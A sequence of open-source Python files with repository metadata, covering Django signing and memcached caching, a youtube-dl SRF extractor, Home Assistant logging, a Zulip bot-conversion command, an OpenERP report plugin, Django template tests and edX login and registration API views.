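# configured SECRET_KEY is assumed since key=None falls back to settings):
#
#   token = dumps({'user': 42}, salt='example.salt')
#   assert loads(token, salt='example.salt') == {'user': 42}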
class Signer(object):
def __init__(self, key=None, sep=':', salt=None):
# Use of native strings in all versions of Python
self.key = key or settings.SECRET_KEY
self.sep = force_str(sep)
if _SEP_UNSAFE.match(self.sep):
raise ValueError(
'Unsafe Signer separator: %r (cannot be empty or consist of '
'only A-z0-9-_=)' % sep,
)
self.salt = force_str(salt or '%s.%s' % (self.__class__.__module__, self.__class__.__name__))
def signature(self, value):
signature = base64_hmac(self.salt + 'signer', value, self.key)
# Convert the signature from bytes to str only on Python 3
return force_str(signature)
def sign(self, value):
value = force_str(value)
return str('%s%s%s') % (value, self.sep, self.signature(value))
def unsign(self, signed_value):
signed_value = force_str(signed_value)
if self.sep not in signed_value:
raise BadSignature('No "%s" found in value' % self.sep)
value, sig = signed_value.rsplit(self.sep, 1)
if constant_time_compare(sig, self.signature(value)):
return force_text(value)
raise BadSignature('Signature "%s" does not match' % sig)
class TimestampSigner(Signer):
def timestamp(self):
return baseconv.base62.encode(int(time.time()))
def sign(self, value):
value = force_str(value)
value = str('%s%s%s') % (value, self.sep, self.timestamp())
return super(TimestampSigner, self).sign(value)
def unsign(self, value, max_age=None):
"""
Retrieve original value and check it wasn't signed more
than max_age seconds ago.
"""
result = super(TimestampSigner, self).unsign(value)
value, timestamp = result.rsplit(self.sep, 1)
timestamp = baseconv.base62.decode(timestamp)
if max_age is not None:
if isinstance(max_age, datetime.timedelta):
max_age = max_age.total_seconds()
# Check timestamp is not older than max_age
age = time.time() - timestamp
if age > max_age:
raise SignatureExpired(
'Signature age %s > %s seconds' % (age, max_age))
return value
|
mit
|
Buggaarde/youtube-dl
|
youtube_dl/extractor/srf.py
|
102
|
4254
|
# coding: utf-8
from __future__ import unicode_literals
import re
from .common import InfoExtractor
from ..utils import (
determine_ext,
parse_iso8601,
xpath_text,
)
class SrfIE(InfoExtractor):
_VALID_URL = r'https?://(?:www\.srf\.ch/play(?:er)?/tv/[^/]+/video/(?P<display_id>[^?]+)\?id=|tp\.srgssr\.ch/p/flash\?urn=urn:srf:ais:video:)(?P<id>[0-9a-f\-]{36})'
_TESTS = [{
'url': 'http://www.srf.ch/play/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5',
'md5': '4cd93523723beff51bb4bee974ee238d',
'info_dict': {
'id': '28e1a57d-5b76-4399-8ab3-9097f071e6c5',
'display_id': 'snowden-beantragt-asyl-in-russland',
'ext': 'm4v',
'upload_date': '20130701',
'title': 'Snowden beantragt Asyl in Russland',
'timestamp': 1372713995,
}
}, {
# No Speichern (Save) button
'url': 'http://www.srf.ch/play/tv/top-gear/video/jaguar-xk120-shadow-und-tornado-dampflokomotive?id=677f5829-e473-4823-ac83-a1087fe97faa',
'md5': 'd97e236e80d1d24729e5d0953d276a4f',
'info_dict': {
'id': '677f5829-e473-4823-ac83-a1087fe97faa',
'display_id': 'jaguar-xk120-shadow-und-tornado-dampflokomotive',
'ext': 'flv',
'upload_date': '20130710',
'title': 'Jaguar XK120, Shadow und Tornado-Dampflokomotive',
'timestamp': 1373493600,
},
}, {
'url': 'http://www.srf.ch/player/tv/10vor10/video/snowden-beantragt-asyl-in-russland?id=28e1a57d-5b76-4399-8ab3-9097f071e6c5',
'only_matching': True,
}, {
'url': 'https://tp.srgssr.ch/p/flash?urn=urn:srf:ais:video:28e1a57d-5b76-4399-8ab3-9097f071e6c5',
'only_matching': True,
}]
def _real_extract(self, url):
video_id = self._match_id(url)
display_id = re.match(self._VALID_URL, url).group('display_id') or video_id
video_data = self._download_xml(
'http://il.srgssr.ch/integrationlayer/1.0/ue/srf/video/play/%s.xml' % video_id,
display_id)
title = xpath_text(
video_data, './AssetMetadatas/AssetMetadata/title', fatal=True)
thumbnails = [{
'url': s.text
} for s in video_data.findall('.//ImageRepresentation/url')]
timestamp = parse_iso8601(xpath_text(video_data, './createdDate'))
# The <duration> field in XML is different from the exact duration, skipping
formats = []
for item in video_data.findall('./Playlists/Playlist') + video_data.findall('./Downloads/Download'):
for url_node in item.findall('url'):
quality = url_node.attrib['quality']
full_url = url_node.text
original_ext = determine_ext(full_url)
format_id = '%s-%s' % (quality, item.attrib['protocol'])
if original_ext == 'f4m':
formats.extend(self._extract_f4m_formats(
full_url + '?hdcore=3.4.0', display_id, f4m_id=format_id))
elif original_ext == 'm3u8':
formats.extend(self._extract_m3u8_formats(
full_url, display_id, 'mp4', m3u8_id=format_id))
else:
formats.append({
'url': full_url,
'ext': original_ext,
'format_id': format_id,
'quality': 0 if 'HD' in quality else -1,
'preference': 1,
})
self._sort_formats(formats)
subtitles = {}
subtitles_data = video_data.find('Subtitles')
if subtitles_data is not None:
subtitles_list = [{
'url': sub.text,
'ext': determine_ext(sub.text),
} for sub in subtitles_data]
if subtitles_list:
subtitles['de'] = subtitles_list
return {
'id': video_id,
'display_id': display_id,
'formats': formats,
'title': title,
'thumbnails': thumbnails,
'timestamp': timestamp,
'subtitles': subtitles,
}
|
unlicense
|
morphis/home-assistant
|
homeassistant/util/logging.py
|
14
|
3216
|
"""Logging utilities."""
import asyncio
import logging
import threading
from .async import run_coroutine_threadsafe
class HideSensitiveDataFilter(logging.Filter):
"""Filter API password calls."""
def __init__(self, text):
"""Initialize sensitive data filter."""
super().__init__()
self.text = text
def filter(self, record):
"""Hide sensitive data in messages."""
record.msg = record.msg.replace(self.text, '*******')
return True
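# Illustrative usage (not part of the original module): attaching the filter to
# a handler redacts the given secret from every emitted record.
#
#   handler = logging.StreamHandler()
#   handler.addFilter(HideSensitiveDataFilter('super-secret-api-password'))
#   logging.getLogger(__name__).addHandler(handler)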
# pylint: disable=invalid-name
class AsyncHandler(object):
"""Logging handler wrapper to add a async layer."""
def __init__(self, loop, handler):
"""Initialize async logging handler wrapper."""
self.handler = handler
self.loop = loop
self._queue = asyncio.Queue(loop=loop)
self._thread = threading.Thread(target=self._process)
# Delegate from handler
self.setLevel = handler.setLevel
self.setFormatter = handler.setFormatter
self.addFilter = handler.addFilter
self.removeFilter = handler.removeFilter
self.filter = handler.filter
self.flush = handler.flush
self.handle = handler.handle
self.handleError = handler.handleError
self.format = handler.format
self._thread.start()
def close(self):
"""Wrap close to handler."""
self.emit(None)
@asyncio.coroutine
def async_close(self, blocking=False):
"""Close the handler.
When blocking=True, will wait till closed.
"""
yield from self._queue.put(None)
if blocking:
while self._thread.is_alive():
yield from asyncio.sleep(0, loop=self.loop)
def emit(self, record):
"""Process a record."""
ident = self.loop.__dict__.get("_thread_ident")
# inside eventloop
if ident is not None and ident == threading.get_ident():
self._queue.put_nowait(record)
# from a thread/executor
else:
self.loop.call_soon_threadsafe(self._queue.put_nowait, record)
def __repr__(self):
"""String name of this."""
return str(self.handler)
def _process(self):
"""Process log in a thread."""
while True:
record = run_coroutine_threadsafe(
self._queue.get(), self.loop).result()
if record is None:
self.handler.close()
return
self.handler.emit(record)
def createLock(self):
"""Ignore lock stuff."""
pass
def acquire(self):
"""Ignore lock stuff."""
pass
def release(self):
"""Ignore lock stuff."""
pass
@property
def level(self):
"""Wrap property level to handler."""
return self.handler.level
@property
def formatter(self):
"""Wrap property formatter to handler."""
return self.handler.formatter
@property
def name(self):
"""Wrap property set_name to handler."""
return self.handler.get_name()
@name.setter
def set_name(self, name):
"""Wrap property get_name to handler."""
self.handler.name = name
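# Illustrative sketch (not part of the original module; the `loop` argument is
# assumed to be the running event loop): wrap a plain StreamHandler in
# AsyncHandler and attach it to the root logger.
def _example_attach_async_handler(loop):
    """Wrap a StreamHandler in AsyncHandler (illustration only)."""
    async_handler = AsyncHandler(loop, logging.StreamHandler())
    logging.getLogger('').addHandler(async_handler)
    return async_handler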
|
apache-2.0
|
extremewaysback/django
|
django/core/cache/backends/memcached.py
|
320
|
6970
|
"Memcached cache backend"
import pickle
import time
from django.core.cache.backends.base import DEFAULT_TIMEOUT, BaseCache
from django.utils import six
from django.utils.encoding import force_str
from django.utils.functional import cached_property
class BaseMemcachedCache(BaseCache):
def __init__(self, server, params, library, value_not_found_exception):
super(BaseMemcachedCache, self).__init__(params)
if isinstance(server, six.string_types):
self._servers = server.split(';')
else:
self._servers = server
# The exception type to catch from the underlying library for a key
# that was not found. This is a ValueError for python-memcache,
# pylibmc.NotFound for pylibmc, and cmemcache will return None without
# raising an exception.
self.LibraryValueNotFoundException = value_not_found_exception
self._lib = library
self._options = params.get('OPTIONS')
@property
def _cache(self):
"""
Implements transparent thread-safe access to a memcached client.
"""
if getattr(self, '_client', None) is None:
self._client = self._lib.Client(self._servers)
return self._client
def get_backend_timeout(self, timeout=DEFAULT_TIMEOUT):
"""
Memcached deals with long (> 30 days) timeouts in a special
way. Call this function to obtain a safe value for your timeout.
"""
if timeout == DEFAULT_TIMEOUT:
timeout = self.default_timeout
if timeout is None:
# Using 0 in memcache sets a non-expiring timeout.
return 0
elif int(timeout) == 0:
# Other cache backends treat 0 as set-and-expire. To achieve this
# in memcache backends, a negative timeout must be passed.
timeout = -1
if timeout > 2592000: # 60*60*24*30, 30 days
# See http://code.google.com/p/memcached/wiki/NewProgramming#Expiration
# "Expiration times can be set from 0, meaning "never expire", to
# 30 days. Any time higher than 30 days is interpreted as a Unix
# timestamp date. If you want to expire an object on January 1st of
# next year, this is how you do that."
#
# This means that we have to switch to absolute timestamps.
timeout += int(time.time())
return int(timeout)
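    # Worked example for the method above (illustration, not part of Django):
    # a 60-day timeout (5184000s) exceeds the 30-day cutoff, so the method
    # returns int(time.time()) + 5184000 as an absolute expiry timestamp,
    # while a timeout of 0 is converted to -1 so the entry expires immediately,
    # matching the set-and-expire behaviour of the other cache backends.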
def make_key(self, key, version=None):
# Python 2 memcache requires the key to be a byte string.
return force_str(super(BaseMemcachedCache, self).make_key(key, version))
def add(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
return self._cache.add(key, value, self.get_backend_timeout(timeout))
def get(self, key, default=None, version=None):
key = self.make_key(key, version=version)
val = self._cache.get(key)
if val is None:
return default
return val
def set(self, key, value, timeout=DEFAULT_TIMEOUT, version=None):
key = self.make_key(key, version=version)
if not self._cache.set(key, value, self.get_backend_timeout(timeout)):
# make sure the key doesn't keep its old value in case of failure to set (memcached's 1MB limit)
self._cache.delete(key)
def delete(self, key, version=None):
key = self.make_key(key, version=version)
self._cache.delete(key)
def get_many(self, keys, version=None):
new_keys = [self.make_key(x, version=version) for x in keys]
ret = self._cache.get_multi(new_keys)
if ret:
_ = {}
m = dict(zip(new_keys, keys))
for k, v in ret.items():
_[m[k]] = v
ret = _
return ret
def close(self, **kwargs):
self._cache.disconnect_all()
def incr(self, key, delta=1, version=None):
key = self.make_key(key, version=version)
# memcached doesn't support a negative delta
if delta < 0:
return self._cache.decr(key, -delta)
try:
val = self._cache.incr(key, delta)
# python-memcache responds to incr on non-existent keys by
# raising a ValueError, pylibmc by raising a pylibmc.NotFound
# and Cmemcache returns None. In all cases,
# we should raise a ValueError though.
except self.LibraryValueNotFoundException:
val = None
if val is None:
raise ValueError("Key '%s' not found" % key)
return val
def decr(self, key, delta=1, version=None):
key = self.make_key(key, version=version)
# memcached doesn't support a negative delta
if delta < 0:
return self._cache.incr(key, -delta)
try:
val = self._cache.decr(key, delta)
        # python-memcache responds to decr on non-existent keys by
        # raising a ValueError, pylibmc by raising a pylibmc.NotFound
        # and cmemcache returns None. In all cases,
        # we should raise a ValueError though.
except self.LibraryValueNotFoundException:
val = None
if val is None:
raise ValueError("Key '%s' not found" % key)
return val
def set_many(self, data, timeout=DEFAULT_TIMEOUT, version=None):
safe_data = {}
for key, value in data.items():
key = self.make_key(key, version=version)
safe_data[key] = value
self._cache.set_multi(safe_data, self.get_backend_timeout(timeout))
def delete_many(self, keys, version=None):
l = lambda x: self.make_key(x, version=version)
self._cache.delete_multi(map(l, keys))
def clear(self):
self._cache.flush_all()
class MemcachedCache(BaseMemcachedCache):
"An implementation of a cache binding using python-memcached"
def __init__(self, server, params):
import memcache
super(MemcachedCache, self).__init__(server, params,
library=memcache,
value_not_found_exception=ValueError)
@property
def _cache(self):
if getattr(self, '_client', None) is None:
self._client = self._lib.Client(self._servers, pickleProtocol=pickle.HIGHEST_PROTOCOL)
return self._client
class PyLibMCCache(BaseMemcachedCache):
"An implementation of a cache binding using pylibmc"
def __init__(self, server, params):
import pylibmc
super(PyLibMCCache, self).__init__(server, params,
library=pylibmc,
value_not_found_exception=pylibmc.NotFound)
@cached_property
def _cache(self):
client = self._lib.Client(self._servers)
if self._options:
client.behaviors = self._options
return client
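# Example configuration (illustration only; server addresses are assumptions)
# selecting the python-memcached binding from a Django settings module:
#
#   CACHES = {
#       'default': {
#           'BACKEND': 'django.core.cache.backends.memcached.MemcachedCache',
#           'LOCATION': '127.0.0.1:11211;127.0.0.1:11212',
#       },
#   }
#
# A ';'-separated LOCATION string is split into multiple servers by
# BaseMemcachedCache.__init__.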
|
bsd-3-clause
|
mahim97/zulip
|
zerver/management/commands/convert_bot_to_outgoing_webhook.py
|
3
|
2259
|
from argparse import ArgumentParser
from typing import Any
from zerver.lib.management import ZulipBaseCommand
from zerver.models import Service, UserProfile
class Command(ZulipBaseCommand):
help = """Given an existing bot, converts it into an outgoing webhook bot."""
def add_arguments(self, parser: ArgumentParser) -> None:
self.add_realm_args(parser)
parser.add_argument('bot_email', metavar='<bot_email>', type=str,
help='email of bot')
parser.add_argument('service_name', metavar='<service_name>', type=str,
help='name of Service object to create')
parser.add_argument('base_url', metavar='<base_url>', type=str,
help='base url of outgoing webhook')
# TODO: Add token and interface as arguments once OutgoingWebhookWorker
# uses these fields on the Service object.
def handle(self, *args: Any, **options: str) -> None:
bot_email = options['bot_email']
service_name = options['service_name']
base_url = options['base_url']
realm = self.get_realm(options)
if not bot_email:
print('Email of existing bot must be provided')
exit(1)
if not service_name:
print('Name for Service object must be provided')
exit(1)
if not base_url:
print('Base URL of outgoing webhook must be provided')
exit(1)
# TODO: Normalize email?
bot_profile = self.get_user(email=bot_email, realm=realm)
if not bot_profile.is_bot:
print('User %s is not a bot' % (bot_email,))
exit(1)
if bot_profile.is_outgoing_webhook_bot:
print('%s is already marked as an outgoing webhook bot' % (bot_email,))
exit(1)
Service.objects.create(name=service_name,
user_profile=bot_profile,
base_url=base_url,
token='',
interface=1)
bot_profile.bot_type = UserProfile.OUTGOING_WEBHOOK_BOT
bot_profile.save()
print('Successfully converted %s into an outgoing webhook bot' % (bot_email,))
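# Example invocation (illustration only; email, service name, URL and the
# realm flag added by add_realm_args are assumptions):
#
#   ./manage.py convert_bot_to_outgoing_webhook [email protected] \
#       my-service https://hooks.example.com/endpoint -r zulip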
|
apache-2.0
|
Elbagoury/odoo
|
addons/base_report_designer/plugin/openerp_report_designer/bin/script/NewReport.py
|
384
|
3903
|
#########################################################################
#
# Copyright (c) 2003-2004 Danny Brewer [email protected]
# Copyright (C) 2004-2010 OpenERP SA (<http://openerp.com>).
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
#
# See: http://www.gnu.org/licenses/lgpl.html
#
#############################################################################
import uno
import string
import unohelper
import xmlrpclib
from com.sun.star.task import XJobExecutor
if __name__<>"package":
from lib.gui import *
from lib.error import ErrorDialog
from lib.functions import *
from lib.logreport import *
from LoginTest import *
from lib.rpc import *
database="test"
uid = 3
#
#
#
# Start OpenOffice.org, listen for connections and open testing document
#
#
class NewReport(unohelper.Base, XJobExecutor):
def __init__(self, ctx):
self.ctx = ctx
self.module = "openerp_report"
self.version = "0.1"
LoginTest()
self.logobj=Logger()
if not loginstatus and __name__=="package":
exit(1)
self.win=DBModalDialog(60, 50, 180, 115, "Open New Report")
self.win.addFixedText("lblModuleSelection", 2, 2, 60, 15, "Module Selection")
self.win.addComboListBox("lstModule", -2,13,176,80 , False)
self.lstModule = self.win.getControl( "lstModule" )
self.aModuleName=[]
desktop=getDesktop()
doc = desktop.getCurrentComponent()
docinfo=doc.getDocumentInfo()
global passwd
self.password = passwd
global url
self.sock=RPCSession(url)
ids = self.sock.execute(database, uid, self.password, 'ir.model' , 'search',[])
fields = [ 'model','name']
res = self.sock.execute(database, uid, self.password, 'ir.model' , 'read', ids, fields)
res.sort(lambda x, y: cmp(x['name'],y['name']))
for i in range(len(res)):
self.lstModule.addItem(res[i]['name'],self.lstModule.getItemCount())
self.aModuleName.append(res[i]['model'])
self.win.addButton('btnOK',-2 ,-5, 70,15,'Use Module in Report' ,actionListenerProc = self.btnOk_clicked )
self.win.addButton('btnCancel',-2 - 70 - 5 ,-5, 35,15,'Cancel' ,actionListenerProc = self.btnCancel_clicked )
self.win.doModalDialog("",None)
def btnOk_clicked(self, oActionEvent):
desktop=getDesktop()
doc = desktop.getCurrentComponent()
docinfo=doc.getDocumentInfo()
docinfo.setUserFieldValue(3,self.aModuleName[self.lstModule.getSelectedItemPos()])
self.logobj.log_write('Module Name',LOG_INFO, ':Module use in creating a report %s using database %s' % (self.aModuleName[self.lstModule.getSelectedItemPos()], database))
self.win.endExecute()
def btnCancel_clicked(self, oActionEvent):
self.win.endExecute()
if __name__<>"package" and __name__=="__main__":
NewReport(None)
elif __name__=="package":
g_ImplementationHelper.addImplementation( \
NewReport,
"org.openoffice.openerp.report.opennewreport",
("com.sun.star.task.Job",),)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
cainmatt/django
|
tests/template_backends/test_utils.py
|
351
|
1521
|
from django.core.exceptions import ImproperlyConfigured
from django.template import engines
from django.test import SimpleTestCase, override_settings
class TemplateStringsTests(SimpleTestCase):
@override_settings(TEMPLATES=[{
'BACKEND': 'raise.import.error',
}])
def test_backend_import_error(self):
"""
Failing to import a backend keeps raising the original import error.
Regression test for #24265.
"""
with self.assertRaises(ImportError):
engines.all()
with self.assertRaises(ImportError):
engines.all()
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# Incorrect: APP_DIRS and loaders are mutually incompatible.
'APP_DIRS': True,
'OPTIONS': {'loaders': []},
}])
def test_backend_improperly_configured(self):
"""
Failing to initialize a backend keeps raising the original exception.
Regression test for #24265.
"""
with self.assertRaises(ImproperlyConfigured):
engines.all()
with self.assertRaises(ImproperlyConfigured):
engines.all()
@override_settings(TEMPLATES=[{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}, {
'BACKEND': 'django.template.backends.django.DjangoTemplates',
}])
def test_backend_names_must_be_unique(self):
with self.assertRaises(ImproperlyConfigured):
engines.all()
|
bsd-3-clause
|
motion2015/edx-platform
|
openedx/core/djangoapps/user_api/views.py
|
31
|
32766
|
"""HTTP end-points for the User API. """
import copy
from opaque_keys import InvalidKeyError
from django.conf import settings
from django.contrib.auth.models import User
from django.http import HttpResponse
from django.core.urlresolvers import reverse
from django.core.exceptions import ImproperlyConfigured, NON_FIELD_ERRORS, ValidationError
from django.utils.translation import ugettext as _
from django.utils.decorators import method_decorator
from django.views.decorators.csrf import ensure_csrf_cookie, csrf_protect, csrf_exempt
from opaque_keys.edx import locator
from rest_framework import authentication
from rest_framework import filters
from rest_framework import generics
from rest_framework import status
from rest_framework import viewsets
from rest_framework.views import APIView
from rest_framework.exceptions import ParseError
from django_countries import countries
from opaque_keys.edx.locations import SlashSeparatedCourseKey
from openedx.core.lib.api.permissions import ApiKeyHeaderPermission
import third_party_auth
from django_comment_common.models import Role
from edxmako.shortcuts import marketing_link
from student.views import create_account_with_params
from student.cookies import set_logged_in_cookies
from openedx.core.lib.api.authentication import SessionAuthenticationAllowInactiveUser
from util.json_request import JsonResponse
from .preferences.api import update_email_opt_in
from .helpers import FormDescription, shim_student_view, require_post_params
from .models import UserPreference, UserProfile
from .accounts import (
NAME_MAX_LENGTH, EMAIL_MIN_LENGTH, EMAIL_MAX_LENGTH, PASSWORD_MIN_LENGTH, PASSWORD_MAX_LENGTH,
USERNAME_MIN_LENGTH, USERNAME_MAX_LENGTH
)
from .accounts.api import check_account_exists
from .serializers import UserSerializer, UserPreferenceSerializer
class LoginSessionView(APIView):
"""HTTP end-points for logging in users. """
# This end-point is available to anonymous users,
# so do not require authentication.
authentication_classes = []
@method_decorator(ensure_csrf_cookie)
def get(self, request): # pylint: disable=unused-argument
"""Return a description of the login form.
This decouples clients from the API definition:
if the API decides to modify the form, clients won't need
to be updated.
See `user_api.helpers.FormDescription` for examples
of the JSON-encoded form description.
Returns:
HttpResponse
"""
form_desc = FormDescription("post", reverse("user_api_login_session"))
# Translators: This label appears above a field on the login form
# meant to hold the user's email address.
email_label = _(u"Email")
# Translators: This example email address is used as a placeholder in
# a field on the login form meant to hold the user's email address.
email_placeholder = _(u"[email protected]")
# Translators: These instructions appear on the login form, immediately
# below a field meant to hold the user's email address.
email_instructions = _(
u"The email address you used to register with {platform_name}"
).format(platform_name=settings.PLATFORM_NAME)
form_desc.add_field(
"email",
field_type="email",
label=email_label,
placeholder=email_placeholder,
instructions=email_instructions,
restrictions={
"min_length": EMAIL_MIN_LENGTH,
"max_length": EMAIL_MAX_LENGTH,
}
)
# Translators: This label appears above a field on the login form
# meant to hold the user's password.
password_label = _(u"Password")
form_desc.add_field(
"password",
label=password_label,
field_type="password",
restrictions={
"min_length": PASSWORD_MIN_LENGTH,
"max_length": PASSWORD_MAX_LENGTH,
}
)
form_desc.add_field(
"remember",
field_type="checkbox",
label=_("Remember me"),
default=False,
required=False,
)
return HttpResponse(form_desc.to_json(), content_type="application/json")
@method_decorator(require_post_params(["email", "password"]))
@method_decorator(csrf_protect)
def post(self, request):
"""Log in a user.
You must send all required form fields with the request.
You can optionally send an `analytics` param with a JSON-encoded
object with additional info to include in the login analytics event.
Currently, the only supported field is "enroll_course_id" to indicate
that the user logged in while enrolling in a particular course.
Arguments:
request (HttpRequest)
Returns:
HttpResponse: 200 on success
HttpResponse: 400 if the request is not valid.
HttpResponse: 403 if authentication failed.
403 with content "third-party-auth" if the user
has successfully authenticated with a third party provider
but does not have a linked account.
HttpResponse: 302 if redirecting to another page.
Example Usage:
POST /user_api/v1/login_session
with POST params `email`, `password`, and `remember`.
200 OK
"""
# For the initial implementation, shim the existing login view
# from the student Django app.
from student.views import login_user
return shim_student_view(login_user, check_logged_in=True)(request)
class RegistrationView(APIView):
"""HTTP end-points for creating a new user. """
DEFAULT_FIELDS = ["email", "name", "username", "password"]
EXTRA_FIELDS = [
"city",
"country",
"gender",
"year_of_birth",
"level_of_education",
"mailing_address",
"goals",
"honor_code",
"terms_of_service",
]
# This end-point is available to anonymous users,
# so do not require authentication.
authentication_classes = []
def _is_field_visible(self, field_name):
"""Check whether a field is visible based on Django settings. """
return self._extra_fields_setting.get(field_name) in ["required", "optional"]
def _is_field_required(self, field_name):
"""Check whether a field is required based on Django settings. """
return self._extra_fields_setting.get(field_name) == "required"
def __init__(self, *args, **kwargs):
super(RegistrationView, self).__init__(*args, **kwargs)
# Backwards compatibility: Honor code is required by default, unless
# explicitly set to "optional" in Django settings.
self._extra_fields_setting = copy.deepcopy(settings.REGISTRATION_EXTRA_FIELDS)
self._extra_fields_setting["honor_code"] = self._extra_fields_setting.get("honor_code", "required")
# Check that the setting is configured correctly
for field_name in self.EXTRA_FIELDS:
if self._extra_fields_setting.get(field_name, "hidden") not in ["required", "optional", "hidden"]:
msg = u"Setting REGISTRATION_EXTRA_FIELDS values must be either required, optional, or hidden."
raise ImproperlyConfigured(msg)
# Map field names to the instance method used to add the field to the form
self.field_handlers = {}
for field_name in self.DEFAULT_FIELDS + self.EXTRA_FIELDS:
handler = getattr(self, "_add_{field_name}_field".format(field_name=field_name))
self.field_handlers[field_name] = handler
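    # Example of the handler-name convention above (illustration only): the
    # "country" entry in EXTRA_FIELDS resolves to self._add_country_field, so
    # adding a new registration field only requires listing its name and
    # defining a matching _add_<field_name>_field method.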
@method_decorator(ensure_csrf_cookie)
def get(self, request):
"""Return a description of the registration form.
This decouples clients from the API definition:
if the API decides to modify the form, clients won't need
to be updated.
This is especially important for the registration form,
since different edx-platform installations might
collect different demographic information.
See `user_api.helpers.FormDescription` for examples
of the JSON-encoded form description.
Arguments:
request (HttpRequest)
Returns:
HttpResponse
"""
form_desc = FormDescription("post", reverse("user_api_registration"))
self._apply_third_party_auth_overrides(request, form_desc)
# Default fields are always required
for field_name in self.DEFAULT_FIELDS:
self.field_handlers[field_name](form_desc, required=True)
# Extra fields configured in Django settings
# may be required, optional, or hidden
for field_name in self.EXTRA_FIELDS:
if self._is_field_visible(field_name):
self.field_handlers[field_name](
form_desc,
required=self._is_field_required(field_name)
)
return HttpResponse(form_desc.to_json(), content_type="application/json")
@method_decorator(csrf_exempt)
def post(self, request):
"""Create the user's account.
You must send all required form fields with the request.
You can optionally send a "course_id" param to indicate in analytics
events that the user registered while enrolling in a particular course.
Arguments:
request (HTTPRequest)
Returns:
HttpResponse: 200 on success
HttpResponse: 400 if the request is not valid.
HttpResponse: 409 if an account with the given username or email
address already exists
"""
data = request.POST.copy()
email = data.get('email')
username = data.get('username')
# Handle duplicate email/username
conflicts = check_account_exists(email=email, username=username)
if conflicts:
conflict_messages = {
# Translators: This message is shown to users who attempt to create a new
# account using an email address associated with an existing account.
"email": _(
u"It looks like {email_address} belongs to an existing account. Try again with a different email address."
).format(email_address=email),
# Translators: This message is shown to users who attempt to create a new
# account using a username associated with an existing account.
"username": _(
u"It looks like {username} belongs to an existing account. Try again with a different username."
).format(username=username),
}
errors = {
field: [{"user_message": conflict_messages[field]}]
for field in conflicts
}
return JsonResponse(errors, status=409)
# Backwards compatibility: the student view expects both
# terms of service and honor code values. Since we're combining
# these into a single checkbox, the only value we may get
# from the new view is "honor_code".
# Longer term, we will need to make this more flexible to support
# open source installations that may have separate checkboxes
# for TOS, privacy policy, etc.
if data.get("honor_code") and "terms_of_service" not in data:
data["terms_of_service"] = data["honor_code"]
try:
user = create_account_with_params(request, data)
except ValidationError as err:
# Should only get non-field errors from this function
assert NON_FIELD_ERRORS not in err.message_dict
# Only return first error for each field
errors = {
field: [{"user_message": error} for error in error_list]
for field, error_list in err.message_dict.items()
}
return JsonResponse(errors, status=400)
response = JsonResponse({"success": True})
set_logged_in_cookies(request, response, user)
return response
def _add_email_field(self, form_desc, required=True):
"""Add an email field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's email address.
email_label = _(u"Email")
# Translators: This example email address is used as a placeholder in
# a field on the registration form meant to hold the user's email address.
email_placeholder = _(u"[email protected]")
form_desc.add_field(
"email",
field_type="email",
label=email_label,
placeholder=email_placeholder,
restrictions={
"min_length": EMAIL_MIN_LENGTH,
"max_length": EMAIL_MAX_LENGTH,
},
required=required
)
def _add_name_field(self, form_desc, required=True):
"""Add a name field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's full name.
name_label = _(u"Full name")
# Translators: This example name is used as a placeholder in
# a field on the registration form meant to hold the user's name.
name_placeholder = _(u"Jane Doe")
# Translators: These instructions appear on the registration form, immediately
# below a field meant to hold the user's full name.
name_instructions = _(u"Needed for any certificates you may earn")
form_desc.add_field(
"name",
label=name_label,
placeholder=name_placeholder,
instructions=name_instructions,
restrictions={
"max_length": NAME_MAX_LENGTH,
},
required=required
)
def _add_username_field(self, form_desc, required=True):
"""Add a username field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's public username.
username_label = _(u"Public username")
# Translators: These instructions appear on the registration form, immediately
# below a field meant to hold the user's public username.
username_instructions = _(
u"The name that will identify you in your courses - "
"{bold_start}(cannot be changed later){bold_end}"
).format(bold_start=u'<strong>', bold_end=u'</strong>')
# Translators: This example username is used as a placeholder in
# a field on the registration form meant to hold the user's username.
username_placeholder = _(u"JaneDoe")
form_desc.add_field(
"username",
label=username_label,
instructions=username_instructions,
placeholder=username_placeholder,
restrictions={
"min_length": USERNAME_MIN_LENGTH,
"max_length": USERNAME_MAX_LENGTH,
},
required=required
)
def _add_password_field(self, form_desc, required=True):
"""Add a password field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a field on the registration form
# meant to hold the user's password.
password_label = _(u"Password")
form_desc.add_field(
"password",
label=password_label,
field_type="password",
restrictions={
"min_length": PASSWORD_MIN_LENGTH,
"max_length": PASSWORD_MAX_LENGTH,
},
required=required
)
def _add_level_of_education_field(self, form_desc, required=True):
"""Add a level of education field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a dropdown menu on the registration
# form used to select the user's highest completed level of education.
education_level_label = _(u"Highest level of education completed")
form_desc.add_field(
"level_of_education",
label=education_level_label,
field_type="select",
options=UserProfile.LEVEL_OF_EDUCATION_CHOICES,
include_default_option=True,
required=required
)
def _add_gender_field(self, form_desc, required=True):
"""Add a gender field to a form description.
Arguments:
form_desc: A form description
Keyword Arguments:
required (bool): Whether this field is required; defaults to True
"""
# Translators: This label appears above a dropdown menu on the registration
# form used to select the user's gender.
